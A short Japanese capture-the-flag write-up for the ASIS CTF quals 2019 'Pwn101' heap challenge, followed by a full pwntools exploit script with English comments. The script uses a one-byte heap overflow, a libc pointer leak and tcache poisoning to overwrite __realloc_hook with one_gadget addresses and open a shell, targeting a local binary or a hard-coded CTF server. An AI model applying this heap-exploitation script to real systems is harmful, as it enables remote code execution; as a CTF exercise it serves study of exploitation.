ASIS CTF quals 2019 Pwn101
事前調査
なんかごちゃごちゃやってても全然SEGVしてくれないので、多分tcacheの実装された問題だということがわかります。
さらに、Heap Overflowがあることがわかります。next chunk sizeを変えられます。
Exploit
後は適当に解きます。
malloc_hook (ではうまくいかなかったので、realloc_hookと組み合わせた)にonegadget RCEでフィニッシュです。
# Exploit script from the writeup above (ASIS CTF quals 2019, Pwn101). It drives
# the challenge binary's numbered text menu over a pwntools tube; `conn` is a
# module-level global assigned in the __main__ block at the bottom and read by
# every helper.
# NOTE(review): this is written against the Python 2 pwntools API. Under
# Python 3 `conn.recv(6) + "\x00\x00"` is bytes + str and raises TypeError.
# The constants 0x3ebc30, 0x4f322 and 0x98c3e are offsets into the specific
# libc the author targeted; nothing here derives or validates them.
from pwn import *

context.log_level = "debug"


def add_address(desc_len, phone_number, name, description):
    """Menu option 1: create an entry.

    `desc_len` and `phone_number` are sent as decimal text after their
    prompts; `name` and `description` are sent raw with no trailing newline,
    so the caller controls their exact length.
    """
    conn.sendlineafter("> ", "1")
    conn.sendlineafter("Description Length: ", str(desc_len))
    conn.sendlineafter("Phone Number: ", str(phone_number))
    conn.sendafter("Name: ", name)
    conn.sendafter("Description: ", description)


def show_address(index):
    """Menu option 2: print the entry at `index` (the caller reads the reply)."""
    conn.sendlineafter("> ", "2")
    conn.sendlineafter("Index: ", str(index))


def delete_address(index):
    """Menu option 3: free the entry at `index`."""
    conn.sendlineafter("> ", "3")
    conn.sendlineafter("Index: ", str(index))


def exploit():
    """Run the writeup's attack sequence against `conn`, then drop to a shell prompt.

    Steps follow the prose above: a heap overflow changes a neighbouring chunk's
    size byte, a freed entry is shown to leak a libc pointer, and an entry is
    overwritten so a later allocation lands on the hook the writeup names.
    """
    # Lay out six entries; the 0xf30 ones are large relative to their 0x130
    # description payload.
    add_address(0x30, 0, "A", "A" * 0x30)
    add_address(0x40, 0, "A", "A" * 0x40)
    add_address(0xf30, 0, "A", "A" * 0x130)
    add_address(0xf30, 0, "A", "A" * 0x130)
    add_address(0xf30, 0, "A", "A" * 0x130)
    add_address(0x230, 0, "A", "A" * 0x230)
    delete_address(0)
    delete_address(2)
    delete_address(3)
    delete_address(4)
    # 0x39 bytes into a 0x38-byte description: the extra "\xf1" is the
    # overflow the writeup describes (presumably the next chunk's size byte).
    add_address(0x38, 0, "A", "A" * 0x38 + "\xf1")
    add_address(0xf30, 0, "A", "\x30")
    # Read entry 2 back and take the first 6 bytes of its description as a
    # little-endian pointer; the name says the author expects __malloc_hook.
    show_address(2)
    conn.recvuntil("Description : ")
    __MALLOC_HOOK = u64(conn.recv(6) + "\x00\x00")
    __REALLOC_HOOK = __MALLOC_HOOK - 0x8
    LIBC_BASE = __MALLOC_HOOK - 0x3ebc30  # fixed offset for the targeted libc
    log.success("__MALLOC_HOOK: 0x%x", __MALLOC_HOOK)
    log.success("LIBC_BASE: 0x%x", LIBC_BASE)
    delete_address(1)
    # Writes a fake size (0x51) and a pointer into the freed region; per the
    # writeup this makes a later 0x40-sized request return __realloc_hook.
    add_address(0xe8, 0, "A", "A" * 0x28 + p64(0x51) + p64(__REALLOC_HOOK))
    add_address(0x40, 0, "A", "A" * 0x40)
    # The two p64 values are libc addresses the writeup calls one_gadget targets.
    add_address(0x40, 0, "A", p64(LIBC_BASE + 0x4f322) + p64(LIBC_BASE + 0x98c3e))
    # Start one more allocation of size 0x40 and hand the tube to the user.
    conn.sendlineafter("> ", "1")
    conn.sendlineafter("Description Length: ", str(0x40))
    conn.interactive()


if __name__ == "__main__":
    # Any extra argv entry selects the remote target; `sys` is not imported
    # explicitly and comes from pwn's star import.
    if len(sys.argv) > 1:
        HOST = "82.196.10.106"
        PORT = 29099
        conn = remote(HOST, PORT)
    else:
        #conn = process(["strace", "./pwn101.elf"])
        conn = process(["./pwn101.elf"])
    exploit()